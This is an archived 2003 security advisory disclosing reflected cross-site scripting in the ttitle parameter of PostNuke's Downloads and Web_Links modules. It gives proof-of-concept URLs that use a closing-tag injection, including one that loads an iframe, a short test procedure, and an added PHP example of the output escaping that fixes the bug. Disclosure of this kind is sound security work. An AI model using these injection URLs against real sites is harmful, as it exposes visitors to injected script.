PostNuke Downloads & Web_Links ttitle variable XSS

From: Lorenzo Hernandez Garcia-Hierro (novappcat_private)
Date: Sat Aug 09 2003 - 11:39:07 PDT


    PostNuke Downloads & Web_Links ttitle variable XSS
    ------
    Product: PostNuke
    Vendor: PostNuke (http://www.POSTNUKE.COM)
    Versions Vulnerable:
    PostNuke Phoenix 0.7.x.x
    Phoenix 0.7.2.3 with patches (in all versions)
    Phoenix 0.7.2.3 without patches (in all versions)
    0.7.2.1
    (All prior versions of 0.7.2.3 with/without patches)
    
    NON-VULNERABLE VERSIONS
    
    - ?
    ---------------------
    
    Description:
    
    PostNuke, one of the most used PHP portal systems, is affected again
    by XSS attacks, now in some modules that use vulnerable URL-passed
    variables. Again, the XSS is made with the closing-tags technique (we
    think that we were the first group using this technique) by passing
    the URL-encoded value of the ">, which is "%3e.
    
    -----------------------------------------
    SECURITY HOLES FOUND and PROOFS OF CONCEPT:
    -----------------------------------------
    
    I encountered an XSS (Cross Site Scripting) vulnerability in the
    ttitle variable of the Downloads & Web_Links modules that allows you
    to include script code in the website.
    
    ---------------------
    | XSS IN            |
    |      TTITLE       | 
    ---------------------
    
    The XSS is in the VARIABLE OF THE DOWNLOADS MODULE CALLED TTITLE:
    
    
    http://[HOST]/[PATH]/modules.php?op=modload&name=Downloads&file=index&req=viewdownloaddetails&lid=[ID]&ttitle=[Yeye XSS ;-)]"%3e[XSS ATTACK]
    
    And you get, of course, the XSS attack in the download page.
    
    Simple and fast.
    
    And the Web_Links module hole...
    
    http://[HOST]/[PATH]/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=[ID]&ttitle=[MORE ? ;-(]"%3e[XSS ATTACK]
    
    Examples:
    
    http://[HOST]/[PATH]/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft Utilities"%3e<h1>I like this hell</h1>
    
    http://[HOST]/[PATH]/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=2553254325446&ttitle=%73%63%6F,%66%61%6B%20%75"%3e<h1>Un ASCII it...</h1><iframe src=http://packetstorm.linuxsecurity.com/javascript/text-convertor-v2.0.html></iframe>
    
    - Proof of Concepts: -
    
    1.- Check a PostNuke portal.
    2.- Check if the Downloads / Web_Links modules are active and...
    3.- Modify the ttitle variable using "%3e and write an XSS attack to
    test it.
    4.- That's all, folks.
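An added illustration of the reflection pattern behind the ttitle bug and the output escaping that closes it; this is example code, not PostNuke's or the advisory author's. It assumes the title is echoed into an HTML attribute (the context the `">` trick relies on), and the function names are hypothetical.

```php
<?php
// Added example, not PostNuke code. Assumption: ttitle is echoed into an
// HTML attribute, which is the context the closing-tags ("%3e) trick needs.

// Constructed raw query value, equivalent to the advisory's Web_Links example.
// PHP URL-decodes the query string when it fills $_GET, so the module sees
// a literal '">' rather than the '"%3e' typed into the URL.
$raw_query_value = 'Mocosoft Utilities"%3e<h1>I like this hell</h1>';
$ttitle = urldecode($raw_query_value);

// Vulnerable pattern: the value is concatenated straight into the markup,
// so '">' closes the attribute and the tag, and the rest is parsed as HTML.
function render_title_unsafe(string $ttitle): string
{
    return '<input type="text" name="ttitle" value="' . $ttitle . '">';
}

// Hardened pattern: escape for the attribute context at output time.
// ENT_QUOTES encodes both " and ', and < > become &lt; &gt;, so the
// browser renders the whole value as text inside the attribute.
function render_title_safe(string $ttitle): string
{
    $escaped = htmlspecialchars($ttitle, ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="ttitle" value="' . $escaped . '">';
}

echo "decoded ttitle: ", $ttitle, "\n";
echo "unsafe: ", render_title_unsafe($ttitle), "\n";
echo "safe:   ", render_title_safe($ttitle), "\n";
```

The same escaping applies wherever ttitle is written into page text; the attribute case is just the one the `"%3e` payload targets.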
    
    
    -----------
    | CONTACT |
    -----------
    
    Lorenzo Hernandez Garcia-Hierro
    --- Computer Security Analyzer ---
    --Nova Projects Professional Coding--
    PGP: Keyfingerprint
    B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
    ID: 0x9C38E1D7
    **********************************
    www.novappc.com
    security.novappc.com
    www.lorenzohgh.com
    ______________________
    
    NSRG-19-7
    



    This archive was generated by hypermail 2b30 : Mon Aug 11 2003 - 13:03:56 PDT